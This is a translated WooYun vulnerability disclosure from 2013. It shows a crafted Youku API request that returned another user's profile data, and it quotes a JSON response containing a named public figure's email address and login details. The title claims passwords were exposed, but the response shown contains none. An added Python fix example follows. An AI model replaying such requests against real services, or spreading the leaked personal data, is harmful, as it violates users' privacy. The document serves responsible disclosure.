
Vulnerability Summary

Defect ID: wooyun-2013-026787

Title: A Youku API allows retrieval of arbitrary users' information, including the specified password

Affected vendor: Youku (优酷)

Author: 猪猪侠

Submitted: 2013-06-24 17:00

Fixed: 2013-08-08 17:00

Published: 2013-08-08 17:00

Vulnerability type: Sensitive information disclosure

Severity: High

Self-assessed Rank: 20

Status: Confirmed by vendor

Source: http://www.wooyun.org; for questions or assistance contact [email protected]



Vulnerability Details

Disclosure status:

2013-06-24: Details sent to the vendor, awaiting vendor handling
2013-06-24: Vendor confirmed; details disclosed to the vendor only
2013-07-04: Details disclosed to core white hats and relevant domain experts
2013-07-14: Details disclosed to regular white hats
2013-07-24: Details disclosed to intern white hats
2013-08-08: Details disclosed to the public

Brief description:

When returning user information, the Youku API was not designed with strict business logic and directly outputs the user's email address, username, password, login IP, mobile number, QQ, MSN and other sensitive data.

Detailed description:

#1 Visit the personal homepage of 老罗 (Lao Luo)

http://i.youku.com/u/id_UMTcwMjk0NA==


#2 The homepage automatically calls the following API to fetch the page-view count of the user's homepage

http://i.youku.com/user_pv/id_425736_md5_1e522f6831febf75e033cfe26fd0cec4_time_1372057646.html


In id_425736_md5, the number after id is the user's real internal user ID.
# Craft a request to fetch the user's data

http://i.youku.com/u/get_status?__rt=1&__ro=&uid=425736&type=user_timeline&page=1&t=1372057786017&size=10


# A test account is used for the demonstration here

[Screenshot: youku.png]

[Screenshot: youkupa.png]


{"userId":"425736","userName":"\u8001\u7f57","name":null,"regDate":"2006-11-04 10:06:54","contentTotal":"28","scoreTotal":"380","favTotal":"0","friendTotal":"0","pkTotal":"3091716","clubTotal":"0","gender":"0","city":"1","birthDay":"0000-00-00","birthDayDesc":"\u65e0\u678160","icon":"100","pvTotal":"391291","orderBy":null,"lastLoginDate":"2006-11-04 10:06:54","lastLoginDateDesc":"6\u5e74\u524d","statValue":null,"subTotal":null,"userSet":"23","email":"laol@youku.com","returnType":null,"icon64":"","icon150":"","iconUpdateTime":null,"contentFavTotal":"13159","ecdUserId":"UMTcwMjk0NA==","genderDesc":"\u7537","cityDesc":"\u5317\u4eac\u5e02","QQ":"","MSN":"","intro":"","status":"1","contentPvTotal":"15564997","messageTotal":"0","subscribeTotal":"0","folderTotal":"1","folderPvTotal":0},"info":{"email_status":0,"uid":425736,"reason":null,"status":0,"nickname":"\u8001\u7f57","bflag":0,"from":null,"nameCheckStatus":0,"ctime":1319188273080,"username":"\u8001\u7f57","email":"laol@youku.com","domain":"","tmpEmail":"","oldUsername":null,"login":1371969255588,"nameVersion":0,"mobile":""},"verified_icon":1,"encode_id":"UMTcwMjk0NA==","is_self":false,"login_user_id":"65214337","login_user_encode_id":"UMjYwODU3MzQ4","it":"\u4ed6","is_official":false,"rolltips":0,"firstrunGuide":1,"firstrunGuidee":2,"firstrunGuideee":0,"favtips":0,"canuseboard":1,"canusebanner":1,"board":{"state":0,"content":""},"mod":{"m_headline":1,"m_video":1,"m_playlist":1,"m_favorite":1,"m_statuses":1,"m_user":1,"m_guestbook":1,"m_friend":1,"m_follower":1,"m_visitor":1,"id":425736,"m_address":1},"pvtime":1372064276,"pvmd5":"79cdb02deead4aede3cf7c4fa8547ac7"}}

Proof of vulnerability:

The login email address of 罗永浩 (Luo Yonghao) was obtained: laol@youku.com

Fix recommendation:

Information that should not be output should, as far as possible, simply not be output.

Copyright notice: please credit 猪猪侠@乌云 when reposting.
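One way to put that advice into practice, added here as an example and not Youku's own code: an allowlist that strips non-public fields from the profile response before it is returned to anyone other than the profile owner, plus a walker that flags sensitive keys in API output as a regression check. The field names are those in the response quoted above; treating the user block as nested under a "user" key, and the choice of which fields are public, are assumptions.

```python
import json

# Added example (not Youku's code). Field names come from the response quoted
# above; which ones count as public is an assumption made for illustration.
PUBLIC_USER_FIELDS = {
    "userId", "userName", "regDate", "contentTotal", "scoreTotal", "favTotal",
    "friendTotal", "icon", "pvTotal", "genderDesc", "cityDesc", "intro",
    "ecdUserId", "status", "lastLoginDateDesc",
}
PUBLIC_INFO_FIELDS = {"uid", "nickname", "username"}
# Keys that must never reach a viewer who is not the profile owner.
SENSITIVE_KEYS = {"email", "tmpEmail", "mobile", "QQ", "MSN", "login",
                  "lastLoginDate", "ctime", "oldUsername"}


def filter_profile(payload: dict) -> dict:
    """Apply the allowlist unless the viewer is the owner (is_self)."""
    if payload.get("is_self"):
        return payload  # the owner may see their own data unchanged
    out = dict(payload)
    out["user"] = {k: v for k, v in payload.get("user", {}).items()
                   if k in PUBLIC_USER_FIELDS}
    out["info"] = {k: v for k, v in payload.get("info", {}).items()
                   if k in PUBLIC_INFO_FIELDS}
    return out


def find_sensitive_keys(obj, path=""):
    """Walk decoded JSON and return the paths of any sensitive keys;
    running this over API output is a cheap regression check."""
    found = []
    if isinstance(obj, dict):
        for k, v in obj.items():
            p = f"{path}.{k}" if path else k
            if k in SENSITIVE_KEYS:
                found.append(p)
            found.extend(find_sensitive_keys(v, p))
    elif isinstance(obj, list):
        for i, v in enumerate(obj):
            found.extend(find_sensitive_keys(v, f"{path}[{i}]"))
    return found


# Constructed sample mirroring the shape of the response on this page
# (the user block is assumed to sit under a "user" key).
SAMPLE = json.loads("""{"user": {"userId": "425736", "userName": "demo",
 "lastLoginDate": "2006-11-04 10:06:54", "email": "demo@example.com",
 "QQ": "", "MSN": "", "cityDesc": "Beijing"},
 "info": {"uid": 425736, "nickname": "demo", "username": "demo",
 "email": "demo@example.com", "login": 1371969255588, "mobile": ""},
 "is_self": false, "login_user_id": "65214337"}""")
```

Running find_sensitive_keys over SAMPLE lists seven leaking paths; after filter_profile the list is empty while the owner view is left untouched.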


Vendor Response

Vendor response:

Severity: High

Vulnerability Rank: 20

Confirmed at: 2013-06-24 17:09

Vendor reply:

Fix in progress

Latest status:

None yet


Vulnerability rating:

Comments

  1. 2013-06-24 17:01 | 齐迹 ( Core white hat | Rank:784 Vulns:100 | An ordinary PHP developer, interested in web security.)

    Again... good grief... @Youku, be more careful when you fix it!

  2. 2013-06-24 17:03 | zzR Certified white hat ( Core white hat | Rank:1382 Vulns:122 | Buying WB at 1:5, unlimited quantity [platform escrow])

    Terrifying~

  3. 2013-06-24 17:03 | 疯狗 Certified white hat ( Intern white hat | Rank:44 Vulns:2 | Having seen every vulnerability under the sun, the heart naturally holds no code.)

    Awesome! mark

  4. 2013-06-24 17:08 | lucky ( Regular white hat | Rank:409 Vulns:84 | Among any three people walking, one can be my teacher########################...)

    What is going on!

  5. 2013-06-24 17:09 | 疯狗 Certified white hat ( Intern white hat | Rank:44 Vulns:2 | Having seen every vulnerability under the sun, the heart naturally holds no code.)

    Youku's API is way too powerful, a model for the whole internet

  6. 2013-06-24 17:10 | 贱心 ( Regular white hat | Rank:248 Vulns:23 | A blade has an edge yet shows no form; with the heart as the blade, that is the hidden blade.)

    The API is built far too powerful

  7. 2013-06-24 17:12 | lucky ( Regular white hat | Rank:409 Vulns:84 | Among any three people walking, one can be my teacher########################...)

    Youku's emergency response really is fast!

  8. 2013-06-24 17:21 | 1ee ( Regular white hat | Rank:105 Vulns:14 | Reading....)

    mark, something to learn from

  9. 2013-06-25 09:53 | 围剿 ( Passer-by | Rank:17 Vulns:5 | Evil decimal)

    Genuinely marking this one

  10. 2013-07-24 20:52 | 黄小昏 ( Intern white hat | Rank:55 Vulns:7 | alert(妹子))

    Marked. Learning

  11. 2013-07-25 00:22 | 十月 ( Passer-by | Rank:12 Vulns:1 | Nobody special)

    mark

  12. 2013-07-28 14:59 | 一碗菊花茶 ( Passer-by | Rank:20 Vulns:5 | ,,,。。。,,。。。。,,,。。)

    Wow,,,,

  13. 2013-08-08 19:36 | 北洋贱队 ( Regular white hat | Rank:252 Vulns:25 )

    Learned something